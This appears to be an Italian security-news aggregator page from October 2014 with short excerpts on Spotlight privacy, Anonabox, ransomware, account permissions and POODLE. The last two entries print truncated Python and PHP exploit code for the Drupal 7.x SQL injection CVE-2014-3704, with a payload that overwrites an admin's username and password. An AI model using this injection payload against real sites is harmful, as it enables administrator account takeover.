GUIDA: Yosemite invia a Apple le ricerche di Spotlight: ecco come disattivarlo

20 ottobre 2014 - Fonte: http://www.calmug.org

SPotlightUna delle principali novità di  Yosemite, la nuova versione di OS X, è il rinnovamento di Spotlight. Adesso, la ricerca di OS X non si limita a cercare solo tra le cartelle, ma estende la sua ricerca anche a Wikipedia, posti vicini… Il guaio è che per ottenere questi risultati, Spotlight invia certi dati ad Apple.

Vengono inviati due dati: vio che viene digitato e la posizione. La posizione viene inviata ad Apple per mostrarti...

Leggi il seguito »

AnonaBox, la soluzione al problema dell’anonimato

20 ottobre 2014 - Fonte: http://duxhack.blogspot.com/
Anonabox è un progetto completamente open source nato dalla sempre più crescente esigenza di anonimato sul web.

A livello funzionale, questa scatoletta filtra OGNI TIPO DI COMUNICAZIONE tra il computer e internet, attraverso la famigerata rete TOR. Il...

Leggi il seguito »

Attenzione al virus ransomware che attacca i Comuni e chiede il riscatto!

20 ottobre 2014 - Fonte: http://www.chiccheinformatiche.com

L’ultimo ransomware che segnaliamo, amici lettori, viene dalla Russia. Questa volta a farne le spese sono stati i siti istituzionali di Comuni ed Enti pubblici.  Da mercoledì si sta infatti diffondendo questo nuovo virus che blocca totalmente tutti i sistemi informatici e nulla possono gli antivirus anche più aggiornati utilizzati dagli esperti IT degli Enti pubblici.

Alcuni antivirus hanno già fatto in tempo ad aggiornarsi e a bloccarlo. Dopo aver rubato la rubrica di posta elettronica di un qualche ufficio in una qualunque città, che spesso contiene gli indirizzi di altri Comuni, il virus spedisce a nome dello stesso ufficio il file «Compenso.Pdf» seguito da una lunga linea continua.

Provenendo l’email...

Leggi il seguito »

Amministratori dei PC al Lavoro. Sì o No?

20 ottobre 2014 - Fonte: http://www.ildottoredeicomputer.com/
Ciao a tutti cari lettori e lettrici,
come forse avrete letto nei miei articoli,
essere amministratori del PC significa soprattutto essere in grado di installare\disinstallare software e periferiche (es. stampanti).
Il vantaggio in ambito aziendale di NON essere amministratori dei PC è soprattutto di avere possibilità ridotte di infettare il computer aziendale oltre che evitare l'installazione di programmi non aziendali.
...

Leggi il seguito »

Come Revocare Accesso di App e Siti agli Account di Facebook, Twitter, Google, Linkedin, ecc..

20 ottobre 2014 - Fonte: http://www.gekissimo.net/
revocare accesso account googleProbabilmente hai dato il permesso per l'accesso da parte di un paio o più applicazioni o qualche sito web al tuo account Google, Facebook, Twitter, Dropbox, o Microsoft. 
Ogni applicazione alla quale hai dato il permesso potrà avere accesso ai tuo account per sempre, o almeno fino alla revoca dello stesso.
In altre parole, ci sono probabilmente parecchi servizi web e applicazioni che...

Leggi il seguito »

Dual Boot Windows & Linux: How to continue to use Windows XP Securely now that Microsoft has Withdrawn Support

20 ottobre 2014 - Fonte: http://vinboisoft.blogspot.com/
Dual Boot Windows & Linux: How to continue to use Windows XP Securely now that Microsoft has Withdrawn SupportContenuto dell'eBook:

This book suggests you Dual Boot Windows XP with a Linux Distribution and user the latter exclusively to access the internet, in order to avoid the...

Leggi il seguito »

Android: in arrivo nuovi VIRUS

20 ottobre 2014 - Fonte: http://www.chiccheinformatiche.com

Stando ad una ricerca pubblicata da Check Point Software Technologies, un’azienda israeliana produttrice di dispositivi di rete e software, specializzata in prodotti relativi alla sicurezza quali firewall e VPN, Android potrebbe essere presto protagonista di nuovi attacchi.

Questa ricerca dimostra come l’architettura del sistema operativo di Google permetta l’intercettazione di informazioni sia in fase di salvataggio che comunicazione.

Ecco quanto messo alla luce dai ricercatori:

Attraverso la nostra ricerca Man in the Binder, abbiamo messo in luce diversi concetti architetturali nell’architettura specifica del sistema operativo Android. Nel dettaglio, discutiamo le funzionalità di comunicazione di dati...

Leggi il seguito »

Attacco “POODLE”: cos’è e come proteggere i dati personali disattivando SSL 3.0

20 ottobre 2014 - Fonte: http://benzene4ever.blogspot.com/
Quando ci si collega ad un sito che gestisce informazioni e dati sensibili che non devono essere letti da persone non autorizzate, la connessione deve avvenire sempre tramite il protocollo HTTPS con l'aggiunta del protocollo...

Clicca sul titolo per continuare a leggere il post su TechnoGeek......

Leggi il seguito »

Drupal Core 7.32 SQL Injection (python Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
  ...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (PHP Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'"...

Leggi il seguito »